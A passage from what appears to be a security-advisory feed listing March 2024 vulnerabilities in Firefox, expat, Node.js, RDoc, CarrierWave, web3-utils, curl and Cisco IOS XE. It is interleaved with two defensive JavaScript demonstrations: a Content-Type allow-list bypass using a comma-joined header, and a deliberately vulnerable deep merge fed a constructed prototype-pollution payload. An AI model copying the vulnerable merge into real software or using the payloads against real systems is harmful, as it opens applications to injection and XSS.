https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6175

26.03.2024 10:09:02  ubuntu  [USN-6588-2] PAM vulnerability (medium)
PAM could be made to stop responding if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6588-2

26.03.2024 02:00:00  cisa  [CISA-2024:0326] CISA Adds One Known Exploited Vulnerability to Catalog (high)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0326
26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1485] firefox security update (critical)
[115.9.1.0.1]
- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file
[115.9.1]
- Add debranding patches (Mustafa Gezen)
- Add OpenELA default preferences (Louis Abel)
[115.9.1-1]
- Update to 115.9.1
[115.9.0-2]
- Update to 115.9.0 build2
[115.9.0-1]
- Update to 115.9.0 build1
- Fix expat CVE-2023-52425
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1485

26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1486] firefox security update (critical)
[115.9.1-1.0.1]
- Remove upstream references [Orabug: 30143292]
- Update distribution for Oracle Linux [Orabug: 30143292]
- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file
[115.9.1-1]
- Update to 115.9.1
[115.9.0-2]
- Update to 115.9.0 build2
[115.9.0-1]
- Update to 115.9.0 build1
- Fix expat CVE-2023-52425
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1486

26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1493] thunderbird security update (moderate)
[115.9.0-1.0.1]
- Add Oracle prefs
[115.9.0-1]
- Update to 115.9.0 build1
- Fix expat CVE-2023-52425
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1493

26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1501] grafana security update (important)
[9.2.10-8]
- Rebuild with latest version of golang
- resolve RHEL-24313
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1501

26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1502] grafana-pcp security update (important)
[5.1.1-2]
- Rebuild with latest version of golang
- resolves CVE-2024-1394
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1502

26.03.2024 02:00:00  oraclelinux  [ELSA-2024-1503] nodejs:18 security update (important)
nodejs
[1:18.19.1-1]
- Rebase to version 18.19.1
- Fixes: CVE-2024-21892 CVE-2024-22019 (high)
- Fixes: CVE-2023-46809 (medium)
nodejs-nodemon
nodejs-packaging
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1503
26.03.2024 02:00:00  redhat  [RHSA-2024:1514] libreoffice security fix update (important)
LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.

Security Fix(es):

* libreoffice: Improper Input Validation leading to arbitrary gstreamer plugin execution (CVE-2023-6185)
* libreoffice: Insufficient macro permission validation leading to macro execution (CVE-2023-6186)

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1514

26.03.2024 02:00:00  redhat  [RHSA-2024:1530] expat security update (moderate)
Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: parsing large tokens can trigger a denial of service (CVE-2023-52425)
* expat: XML Entity Expansion (CVE-2024-28757)

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1530

26.03.2024 02:00:00  redhat  [RHSA-2024:1510] nodejs:18 security update (important)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.

Security Fix(es):

* nodejs: reading unprocessed HTTP request with unbounded chunk extension allows DoS attacks (CVE-2024-22019)
* nodejs: vulnerable to timing variant of the Bleichenbacher attack against PKCS#1 v1.5 padding (Marvin) (CVE-2023-46809)
* nodejs: code injection and privilege escalation through Linux capabilities (CVE-2024-21892)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1510
27.03.2024 00:44:52  rubysec  [RUBYSEC:CARRIERWAVE-2024-29034] CarrierWave Content-Type allowlist bypass vulnerability which possibly leads to XSS remained (medium)

### Impact

The vulnerability [CVE-2023-49090](https://github.com/carrierwaveuploader/carrierwave/security/advisories/GHSA-gxhx-g4fq-49hj) wasn't fully addressed.

This vulnerability is caused by the fact that when uploading to object storage, including Amazon S3, it is possible to set a Content-Type value that is interpreted by browsers to be different from what's allowed by `content_type_allowlist`, by providing multiple values separated by commas.

This bypassed value can be used to cause XSS.

### Patches

Upgrade to [3.0.7](https://rubygems.org/gems/carrierwave/versions/3.0.7) or [2.2.6](https://rubygems.org/gems/carrierwave/versions/2.2.6).

### Workarounds

Use the following monkey patch to let CarrierWave parse the Content-Type by using `Marcel::MimeType.for`.

```ruby
# For CarrierWave 3.x
CarrierWave::SanitizedFile.class_eval do
  def declared_content_type
    @declared_content_type ||
      if @file.respond_to?(:content_type) && @file.content_type
        Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
      end
  end
end
```

```ruby
# For CarrierWave 2.x
CarrierWave::SanitizedFile.class_eval do
  def existing_content_type
    if @file.respond_to?(:content_type) && @file.content_type
      Marcel::MimeType.for(declared_type: @file.content_type.to_s.chomp)
    end
  end
end
```

### References

[OWASP - File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation)

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CARRIERWAVE-2024-29034
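The comma-joined Content-Type bypass above, as an added example that is not CarrierWave's code: a check that accepts a declared Content-Type whenever any allow-listed type appears somewhere in it (a model of the weak behaviour, not CarrierWave's actual matching logic), next to one that requires exactly one media type in the form RFC 7231 defines, compares the parsed `type/subtype`, and stores only the normalized value. The allow-list and sample headers are constructed.

```javascript
// Added example, not CarrierWave's code: substring allow-list vs. strict
// single-media-type parsing of a client-declared Content-Type.

const ALLOWLIST = ['image/png', 'image/jpeg', 'image/gif'];

// Weak: passes if any allowed type occurs anywhere in the declared value,
// so "image/png, text/html" is accepted and the raw string gets stored.
function allowedWeak(declared) {
  return ALLOWLIST.some((t) => declared.includes(t));
}

// RFC 7231 section 3.1.1.1: media-type = type "/" subtype *( OWS ";" OWS parameter )
// `type` and `subtype` are tokens; a comma is not a token character, so a
// comma-separated list can never parse as one media type.
const TOKEN = "[!#$%&'*+.^_`|~0-9A-Za-z-]+";
const MEDIA_TYPE = new RegExp(`^(${TOKEN})/(${TOKEN})\\s*(?:;.*)?$`);

// Returns the lowercased "type/subtype", or null if the value is not exactly
// one media type. Commas are rejected outright, even inside parameters.
function parseSingleMediaType(declared) {
  if (declared.includes(',')) return null;
  const m = MEDIA_TYPE.exec(declared.trim());
  return m ? `${m[1]}/${m[2]}`.toLowerCase() : null;
}

// Strict: exactly one media type, and it must be on the allow-list.
function allowedStrict(declared) {
  const mediaType = parseSingleMediaType(declared);
  return mediaType !== null && ALLOWLIST.includes(mediaType);
}

// What to put on the stored object (S3 and friends): the normalized value,
// never the header as the client sent it.
function contentTypeToStore(declared) {
  return allowedStrict(declared) ? parseSingleMediaType(declared) : null;
}

// Constructed sample headers.
const SAMPLES = ['image/png', 'IMAGE/PNG; charset=binary', 'image/png, text/html', 'text/html'];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'weak:', allowedWeak(s), 'strict:', allowedStrict(s));
}
```

The strict parser is the check; `contentTypeToStore` is the part that closes the gap the advisory describes, because what reaches the browser is whatever the object store was told, not what the allow-list saw.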
26.03.2024 14:14:36  rubysec  [RUBYSEC:RDOC-2024-27281] RCE vulnerability with .rdoc_options in RDoc
An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0.

When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored.

When loading the documentation cache, object injection and resultant remote code execution are also possible if there is a crafted cache.

We recommend updating the RDoc gem to version 6.6.3.1 or later. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead:

* For Ruby 3.0 users: Update to `rdoc` 6.3.4.1
* For Ruby 3.1 users: Update to `rdoc` 6.4.1.1
* For Ruby 3.2 users: Update to `rdoc` 6.5.1.1

You can use `gem update rdoc` to update it. If you are using bundler, please add `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`.

Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have an incorrect fix. We recommend upgrading to 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RDOC-2024-27281

26.03.2024 14:14:36  rubysec  [RUBYSEC:STRINGIO-2024-27280] Buffer overread vulnerability in StringIO
An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x through 3.0.6 and 3.1.x through 3.1.4.

The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of a string, and a subsequent call to `StringIO.gets` may return the memory value.

StringIO 3.0.3 and later, and Ruby 3.2.x and later, are not affected by this vulnerability.

We recommend updating the StringIO gem to version 3.0.3 or later. In order to ensure compatibility with the bundled version in older Ruby series, you may update as follows instead:

* For Ruby 3.0 users: Update to `stringio` 3.0.1.1
* For Ruby 3.1 users: Update to `stringio` 3.0.1.2

You can use `gem update stringio` to update it. If you are using bundler, please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:STRINGIO-2024-27280
27.03.2024 23:57:43  npm  [NPM:GHSA-2G4C-8FPM-C46V] web3-utils Prototype Pollution vulnerability (high)

### Impact

The mergeDeep() function in the web3-utils package has been identified as having a Prototype Pollution vulnerability. An attacker has the ability to modify an object's prototype, which could result in changing the behavior of all objects that inherit from the impacted prototype, by providing carefully crafted input to the function.

### Patches

It has been fixed in web3-utils version 4.2.1, so all packages and apps depending on web3-utils >=4.0.1 and <=4.2.0 should upgrade to web3-utils 4.2.1.

### Workarounds

None

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2G4C-8FPM-C46V
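The "insecure recursive merge" that the two web3-utils entries describe, and the same class of bug behind the @thi.ng/paths `mutIn` entry earlier on this page, as an added example rather than either project's code: a deep merge that walks into a `__proto__` key from parsed JSON and so writes onto `Object.prototype`, beside a merge that refuses the dangerous keys and only recurses into own properties. The payload is constructed.

```javascript
// Added example, not web3-utils or @thi.ng/paths code: prototype pollution
// through a recursive merge, and a hardened merge.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Insecure: recurses into every key of `source`, including "__proto__".
// JSON.parse creates an own property literally named "__proto__", while
// target["__proto__"] resolves to Object.prototype, so the recursion
// writes attacker-chosen keys onto the prototype shared by every object.
function mergeDeepUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      mergeDeepUnsafe(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: skip keys that reach the prototype chain, and only recurse into
// an OWN plain-object property of target (never an inherited one).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function mergeDeepSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      mergeDeepSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input, e.g. a JSON request body.
const PAYLOAD = '{"__proto__": {"polluted": "yes"}, "name": "x"}';

// Returns what an unrelated, freshly created object reports for `polluted`.
function runUnsafe() {
  try {
    mergeDeepUnsafe({}, JSON.parse(PAYLOAD));
    return ({}).polluted;               // 'yes': every object in the process is affected
  } finally {
    delete Object.prototype.polluted;   // undo the global damage for the rest of the run
  }
}
function runSafe() {
  mergeDeepSafe({}, JSON.parse(PAYLOAD));
  return ({}).polluted;                 // undefined: the key was refused
}

console.log('unsafe merge ->', runUnsafe()); // yes
console.log('safe merge   ->', runSafe());   // undefined
```

The `finally` cleanup exists only because the demonstration runs both merges in one process; in an application nothing removes the polluted property, which is why a single successful request can change the behaviour of every later one.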
27.03.2024 23:03:51  ubuntu  [USN-6686-5] Linux kernel (Intel IoTG) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-5

27.03.2024 22:38:24  ubuntu  [USN-6715-1] unixODBC vulnerability (high)
unixODBC could be made to crash or execute arbitrary code.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6715-1
27.03.2024 21:16:33  slackware  [SSA:2024-087-01] curl
New curl packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/curl-8.7.1-i586-1_slack15.0.txz: Upgraded.
  This release fixes the following security issues:
  TLS certificate check bypass with mbedTLS.
  HTTP/2 push headers memory-leak.
  QUIC certificate check bypass with wolfSSL.
  Usage of disabled protocol.
  For more information, see:
    https://curl.se/docs/CVE-2024-2466.html
    https://curl.se/docs/CVE-2024-2398.html
    https://curl.se/docs/CVE-2024-2379.html
    https://curl.se/docs/CVE-2024-2004.html
    https://www.cve.org/CVERecord?id=CVE-2024-2466
    https://www.cve.org/CVERecord?id=CVE-2024-2398
    https://www.cve.org/CVERecord?id=CVE-2024-2379
    https://www.cve.org/CVERecord?id=CVE-2024-2004
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/curl-8.7.1-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/curl-8.7.1-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-8.7.1-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-8.7.1-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
6dcc367eb1662d18d27634964e3edc43  curl-8.7.1-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
ab44b6a97d7c8fcf8ac68d5a1ccf7198  curl-8.7.1-x86_64-1_slack15.0.txz

Slackware -current package:
06338d1a2e44fc4c0401237ab2ed9847  n/curl-8.7.1-i586-1.txz

Slackware x86_64 -current package:
819a75ff741c056206f9b2d37a1ada1c  n/curl-8.7.1-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg curl-8.7.1-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-087-01
27.03.2024 23:56:04  maven  [MAVEN:GHSA-R3HX-QFH5-R9M7] Elasticsearch Incorrect Authorization vulnerability (moderate)
An Incorrect Authorization issue exists in the API key based security model for Remote Cluster Security, which is currently in Beta, in Elasticsearch 8.10.0 and before 8.13.0. This allows a malicious user with a valid API key for a remote cluster configured to use the new Remote Cluster Security to read arbitrary documents from any index on the remote cluster, and only if they use the Elasticsearch custom transport protocol to issue requests with the target index ID, the shard ID and the document ID. None of the Elasticsearch REST API endpoints are affected by this issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R3HX-QFH5-R9M7

27.03.2024 23:56:09  maven  [MAVEN:GHSA-W5GG-2Q56-6H4F] Elasticsearch Uncontrolled Resource Consumption vulnerability (moderate)
A flaw was discovered in Elasticsearch, where processing a document in a deeply nested pipeline on an ingest node could cause the Elasticsearch node to crash.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W5GG-2Q56-6H4F
27.03.2024 18:00:00  cisco  [CISCO-SA-WLC-MDNS-DOS-4HV6PBGF] Cisco IOS XE Software for Wireless LAN Controllers Multicast DNS Denial of Service Vulnerability (high)
A vulnerability in the multicast DNS (mDNS) gateway feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition.

This vulnerability is due to improper management of mDNS client entries. An attacker could exploit this vulnerability by connecting to the wireless network and sending a continuous stream of specific mDNS packets. A successful exploit could allow the attacker to cause the wireless controller to have high CPU utilization, which could lead to access points (APs) losing their connection to the controller and result in a DoS condition.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WLC-MDNS-DOS-4HV6PBGF

27.03.2024 18:00:00  cisco  [CISCO-SA-LISP-3GYXS3QP] Cisco IOS and IOS XE Software Locator ID Separation Protocol Denial of Service Vulnerability (high)
A vulnerability in the Locator ID Separation Protocol (LISP) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload.

This vulnerability is due to the incorrect handling of LISP packets. An attacker could exploit this vulnerability by sending a crafted LISP packet to an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.

Note: This vulnerability could be exploited over either IPv4 or IPv6 transport.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-LISP-3GYXS3QP

27.03.2024 18:00:00  cisco  [CISCO-SA-ISIS-SGJYOUHX] Cisco IOS and IOS XE Software Intermediate System-to-Intermediate System Denial of Service Vulnerability (high)
A vulnerability in the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device.

This vulnerability is due to insufficient input validation when parsing an ingress IS-IS packet. An attacker could exploit this vulnerability by sending a crafted IS-IS packet to an affected device after forming an adjacency. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.

Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2-adjacent to the affected device and have formed an adjacency.

Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISIS-SGJYOUHX

27.03.2024 18:00:00  cisco  [CISCO-SA-IOSXE-WLC-PRIVESC-RJSMRMPK] Cisco IOS XE Software for Wireless LAN Controllers Privilege Escalation Vulnerability (medium)
A vulnerability in the CLI of Cisco IOS XE Software could allow an authenticated, low-privileged, local attacker to access WLAN configuration details including passwords.

This vulnerability is due to improper privilege checks. An attacker could exploit this vulnerability by using the `show` and `show tech wireless` CLI commands to access configuration details, including passwords. A successful exploit could allow the attacker to access configuration details that they are not authorized to access.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-WLC-PRIVESC-RJSMRMPK

27.03.2024 18:00:00  cisco  [CISCO-SA-IOSXE-UTD-CMD-JBL8KVHT] Cisco IOS XE Software Unified Threat Defense Command Injection Vulnerability (medium)
A vulnerability in the Unified Threat Defense (UTD) configuration CLI of Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying host operating system. To exploit this vulnerability, an attacker must have level 15 privileges on the affected device.

This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by submitting a crafted CLI command to an affected device. A successful exploit could allow the attacker to execute arbitrary commands as root on the underlying operating system.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-priv-cmd-esc-JbL8KvHT

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-UTD-CMD-JBL8KVHT
27.03.2024 18:00:00  cisco  [CISCO-SA-IOSXE-PRIV-ESC-SEAX6NLX] Cisco IOS XE Software Privilege Escalation Vulnerability (medium)
A vulnerability in the NETCONF feature of Cisco IOS XE Software could allow an authenticated, remote attacker to elevate privileges to root on an affected device.

This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted input over NETCONF to an affected device. A successful exploit could allow the attacker to elevate privileges from Administrator to root.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-PRIV-ESC-SEAX6NLX

27.03.2024 18:00:00  cisco  [CISCO-SA-IOSXE-OSPF-DOS-DR9SFRXP] Cisco IOS XE Software OSPFv2 Denial of Service Vulnerability (high)
A vulnerability in the OSPF version 2 (OSPFv2) feature of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.

This vulnerability is due to improper validation of OSPF updates that are processed by a device. An attacker could exploit this vulnerability by sending a malformed OSPF update to the device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXE-OSPF-DOS-DR9SFRXP

27.03.2024 18:00:00  cisco  [CISCO-SA-IOS-XE-SDA-EDGE-DOS-QZWUWXWG] Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability (high)
A vulnerability in the IPv4 Software-Defined Access (SD-Access) fabric edge node feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause high CPU utilization and stop all traffic processing, resulting in a denial of service (DoS) condition on an affected device.

This vulnerability is due to improper handling of certain IPv4 packets. An attacker could exploit this vulnerability by sending certain IPv4 packets to an affected device. A successful exploit could allow the attacker to cause the device to exhaust CPU resources and stop processing traffic, resulting in a DoS condition.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-XE-SDA-EDGE-DOS-QZWUWXWG

27.03.2024 18:00:00  cisco  [CISCO-SA-IOS-DOS-HQ4D3TZG] Cisco IOS Software for Catalyst 6000 Series Switches Denial of Service Vulnerability (high)
A vulnerability in Cisco IOS Software for Cisco Catalyst 6000 Series Switches could allow an unauthenticated, adjacent attacker to cause an affected device to reload unexpectedly.

This vulnerability is due to improper handling of process-switched traffic. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOS-DOS-HQ4D3TZG

27.03.2024 18:00:00  cisco  [CISCO-SA-IKEV1-NO2CCFWZ] Cisco IOS and IOS XE Software Internet Key Exchange Version 1 Fragmentation Denial of Service Vulnerabilities (high)
Multiple vulnerabilities in the Internet Key Exchange version 1 (IKEv1) fragmentation feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a heap overflow or corruption on an affected system.

For more information about these vulnerabilities, see the Details section of this advisory.

Cisco has released software updates that address these vulnerabilities. There are workarounds that address these vulnerabilities.

This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication (https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056).
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IKEV1-NO2CCFWZ
27.03.2024 18:00:00cisco[CISCO-SA-DMI-ACL-BYPASS-XV8FO8VZ] Cisco IOS XE Software NETCONF/RESTCONF IPv4 Access Control List Bypass Vulnerability (medium)A vulnerability in the data model interface (DMI) services of Cisco IOS XE Software could allow an unauthenticated, remote attacker to access resources that should have been protected by a configured IPv4 access control list (ACL).This vulnerability is due to improper handling of error conditions when a successfully authorized device administrator updates an IPv4 ACL using the NETCONF or RESTCONF protocol, and the update would reorder access control entries (ACEs) in the updated ACL. An attacker could exploit this vulnerability by accessing resources that should have been protected across an affected device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DMI-ACL-BYPASS-XV8FO8VZ
27.03.2024 18:00:00cisco[CISCO-SA-DHCP-DOS-T3CXPO9Z] Cisco IOS XE Software DHCP Snooping with Endpoint Analytics Denial of Service Vulnerability (high)A vulnerability in the DHCP snooping feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to a crafted IPv4 DHCP request packet being mishandled when endpoint analytics are enabled. An attacker could exploit this vulnerability by sending a crafted DHCP request through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.Note: The attack vector is listed as network because a DHCP relay anywhere on the network could allow exploits from networks other than the adjacent one.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2023 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75056"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DHCP-DOS-T3CXPO9Z
27.03.2024 18:00:00cisco[CISCO-SA-CCC-AUTHZ-BYPASS-5EKCHJRB] Cisco Catalyst Center Authorization Bypass Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Catalyst Center, formerly Cisco DNA Center, could allow an authenticated, remote attacker to change specific data within the interface on an affected device.This vulnerability is due to insufficient authorization enforcement. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to change a specific field within the web-based management interface, even though they should not have access to change that field.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CCC-AUTHZ-BYPASS-5EKCHJRB
